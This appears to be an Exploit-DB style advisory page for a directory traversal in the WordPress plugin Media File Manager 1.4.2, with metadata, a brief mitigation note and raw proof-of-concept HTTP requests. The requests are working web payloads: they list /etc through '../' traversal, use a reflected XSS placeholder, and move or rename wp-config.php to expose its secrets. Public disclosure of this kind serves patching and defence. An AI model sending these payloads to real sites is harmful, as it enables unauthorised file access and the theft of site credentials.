Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal

vendor:

Media File Manager

by:

Pasquale Turi (aka boombyte)

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Media File Manager

Affected Version From: 1.4.2

Affected Version To: 1.4.2

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:media_file_manager:1.4.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 18.10

2018

WordPress Plugin Media File Manager 1.4.2 – Directory Traversal

This plugin can be used for manage the uploaded file (we can rename files, see a preview, delete and move them to other folders under wordpress upload folder). This plugin can be used by administrator, author, contributor and subscriber. An attacker can exploit this vulnerability to traverse the directory and access sensitive information such as the /etc/passwd file or move any file to any directory.

Mitigation:

Update the plugin to the latest version and restrict access to the plugin to only trusted users.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal
# Date: 2018-05-11
# Exploit Author: Pasquale Turi (aka boombyte)
# Vendor Homepage: https://wordpress.org/plugins/media-file-manager/
# Software Link: https://wordpress.org/plugins/media-file-manager/
# Version: 1.4.2
# CVE: N/A
# Tested on: Ubuntu 18.10

# Plugin description:
# This plugin can be used for manage the uploaded file (we can rename files, see a preview, 
# delete and move them to other folders under wordpress upload 	folder).
# This plugin can be used by administrator, author, contributor and subscriber.

# POC
# Diretory trasversal:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: REDATED
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie:	REDACTED

action=mrelocator_getdir&dir=../../../../../../../etc

# POC
# XSS Reflected

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: close
Cookie: REDACTED

action=mrelocator_getdir&dir=[XSS]

# POC
# Move any file to any dir:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: REDACTED

action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php

# POC
# Rename any file:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Connection: close
Cookie:	REDACTED

action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt